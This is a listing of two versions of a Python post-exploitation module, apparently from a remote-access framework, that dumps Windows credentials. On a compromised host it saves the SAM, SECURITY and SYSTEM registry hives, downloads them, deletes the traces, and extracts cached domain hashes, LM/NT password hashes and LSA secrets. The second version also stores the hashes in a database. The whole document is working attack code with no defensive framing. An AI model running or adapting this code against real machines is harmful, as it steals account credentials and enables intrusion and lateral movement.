Example #1
0
    def run(self, args):
        # First, we download the hives...
        rep=os.path.join("data","downloads",self.client.short_name(),"hives")
        try:
            os.makedirs(rep)
        except Exception:
            pass
        
        self.info("saving SYSTEM hives in %TEMP%...")
        for cmd in ("reg save HKLM\\SYSTEM %TEMP%/SYSTEM /y", "reg save HKLM\\SECURITY %TEMP%/SECURITY /y", "reg save HKLM\\SAM %TEMP%/SAM /y"):
            self.info("running %s..." % cmd)
            self.log(shell_exec(self.client, cmd))
        self.success("hives saved!")            
        remote_temp=self.client.conn.modules['os.path'].expandvars("%TEMP%")
        
        self.info("downloading SYSTEM hive...")
        download(self.client.conn, ntpath.join(remote_temp, "SYSTEM"), os.path.join(rep, "SYSTEM"))
        
        self.info("downloading SECURITY hive...")
        download(self.client.conn, ntpath.join(remote_temp, "SECURITY"), os.path.join(rep, "SECURITY"))
        
        self.info("downloading SAM hive...")
        download(self.client.conn, ntpath.join(remote_temp, "SAM"), os.path.join(rep, "SAM"))
        
        self.success("hives downloaded to %s" % rep)
        
        # Cleanup
        self.info("cleaning up saves...")
        try:
            self.client.conn.modules.os.remove(ntpath.join(remote_temp, "SYSTEM"))
            self.client.conn.modules.os.remove(ntpath.join(remote_temp, "SECURITY"))
            self.client.conn.modules.os.remove(ntpath.join(remote_temp, "SAM"))
            self.success("saves deleted")
        except Exception as e:
            self.warning("error deleting temporary files: %s"%str(e))
        
        # Time to run creddump!
        # HiveFileAddressSpace - Volatilty
        sysaddr = HiveFileAddressSpace(os.path.join(rep, "SYSTEM"))
        secaddr = HiveFileAddressSpace(os.path.join(rep, "SECURITY"))
        samaddr = HiveFileAddressSpace(os.path.join(rep, "SAM"))
    
        #detect windows version
        is_vista=False
        try:
            if self.client.conn.modules['sys'].getwindowsversion()[0] >=6:
                is_vista=True
                self.info("windows > vista detected")
            else:
                self.info("windows < vista detected")
        except:
            self.warning("windows version couldn't be determined. supposing vista=False")


        # Print the results
        self.info("dumping cached domain passwords...")

        for (u, d, dn, h) in dump_hashes(sysaddr, secaddr, is_vista):
            self.log("%s:%s:%s:%s" % (u.lower(), h.encode('hex'),
                d.lower(), dn.lower()))
        
        self.info("dumping LM and NT hashes...")
        bootkey = get_bootkey(sysaddr)
        hbootkey = get_hbootkey(samaddr,bootkey)
        for user in get_user_keys(samaddr):
            lmhash, nthash = get_user_hashes(user,hbootkey)
            if not lmhash: lmhash = empty_lm
            if not nthash: nthash = empty_nt
            self.log("%s:%d:%s:%s:::" % (get_user_name(user), int(user.Name, 16),
                lmhash.encode('hex'), nthash.encode('hex')))
        
        self.info("dumping lsa secrets...")
        secrets = get_file_secrets(os.path.join(rep, "SYSTEM"),
            os.path.join(rep, "SECURITY"), is_vista)
        if not secrets:
            self.error("unable to read LSA secrets, perhaps the hives are corrupted")
            return
        for key in secrets:
            self.log(key)
            self.log(self.dump(secrets[key], length=16))
        
        # The End! (hurrah)
        self.success("dump was successfull!")
    def windows(self):
        # First, we download the hives...

        #detect windows version
        is_vista = False
        try:
            if self.client.conn.modules['sys'].getwindowsversion()[0] >= 6:
                is_vista = True
                self.info("windows > vista detected")
            else:
                self.info("windows < vista detected")
        except:
            self.warning(
                "windows version couldn't be determined. supposing vista=False"
            )

        self.success("saving SYSTEM hives in %TEMP%...")
        cmds = ("reg save HKLM\\SYSTEM %TEMP%/SYSTEM",
                "reg save HKLM\\SECURITY %TEMP%/SECURITY",
                "reg save HKLM\\SAM %TEMP%/SAM")
        if is_vista:
            cmds = (x + ' /y' for x in cmds)

        for cmd in cmds:
            self.info("running %s..." % cmd)
            self.log(shell_exec(self.client, cmd))
        self.success("hives saved!")
        remote_temp = self.client.conn.modules['os.path'].expandvars("%TEMP%")

        self.info("downloading SYSTEM hive...")
        download(self.client.conn, ntpath.join(remote_temp, "SYSTEM"),
                 os.path.join(self.rep, "SYSTEM"))

        self.info("downloading SECURITY hive...")
        download(self.client.conn, ntpath.join(remote_temp, "SECURITY"),
                 os.path.join(self.rep, "SECURITY"))

        self.info("downloading SAM hive...")
        download(self.client.conn, ntpath.join(remote_temp, "SAM"),
                 os.path.join(self.rep, "SAM"))

        self.success("hives downloaded to %s" % self.rep)

        # Cleanup
        self.success("cleaning up saves...")
        try:
            self.client.conn.modules.os.remove(
                ntpath.join(remote_temp, "SYSTEM"))
            self.client.conn.modules.os.remove(
                ntpath.join(remote_temp, "SECURITY"))
            self.client.conn.modules.os.remove(ntpath.join(remote_temp, "SAM"))
            self.success("saves deleted")
        except Exception as e:
            self.warning("error deleting temporary files: %s" % str(e))

        # Time to run creddump!
        hashes = []

        # HiveFileAddressSpace - Volatilty
        sysaddr = HiveFileAddressSpace(os.path.join(self.rep, "SYSTEM"))
        secaddr = HiveFileAddressSpace(os.path.join(self.rep, "SECURITY"))
        samaddr = HiveFileAddressSpace(os.path.join(self.rep, "SAM"))

        # Print the results
        self.success("dumping cached domain passwords...")

        for (u, d, dn, h) in dump_hashes(sysaddr, secaddr, is_vista):
            self.log("%s:%s:%s:%s" %
                     (u.lower(), h.encode('hex'), d.lower(), dn.lower()))
            hashes.append({
                'Login':
                u.lower(),
                'Hash':
                "%s:%s:%s" % (h.encode('hex'), d.lower(), dn.lower()),
                'Category':
                'MSCACHE hash',
                'CredType':
                'hash'
            })

        self.success("dumping LM and NT hashes...")
        bootkey = get_bootkey(sysaddr)
        hbootkey = get_hbootkey(samaddr, bootkey)
        for user in get_user_keys(samaddr):
            lmhash, nthash = get_user_hashes(user, hbootkey)
            if not lmhash: lmhash = empty_lm
            if not nthash: nthash = empty_nt
            self.log("%s:%d:%s:%s:::" % (get_user_name(user), int(
                user.Name, 16), lmhash.encode('hex'), nthash.encode('hex')))
            hashes.append({
                'Login':
                get_user_name(user),
                'Hash':
                "%s:%s" % (lmhash.encode('hex'), nthash.encode('hex')),
                'Category':
                'NTLM hash',
                'CredType':
                'hash'
            })

        self.db.add(hashes)
        self.success("Hashes stored on the database")

        self.success("dumping lsa secrets...")
        secrets = get_file_secrets(os.path.join(self.rep, "SYSTEM"),
                                   os.path.join(self.rep, "SECURITY"),
                                   is_vista)
        if not secrets:
            self.error(
                "unable to read LSA secrets, perhaps the hives are corrupted")
            return
        for key in secrets:
            self.log(key)
            self.log(self.dump(secrets[key], length=16))

        # The End! (hurrah)
        self.success("dump was successfull!")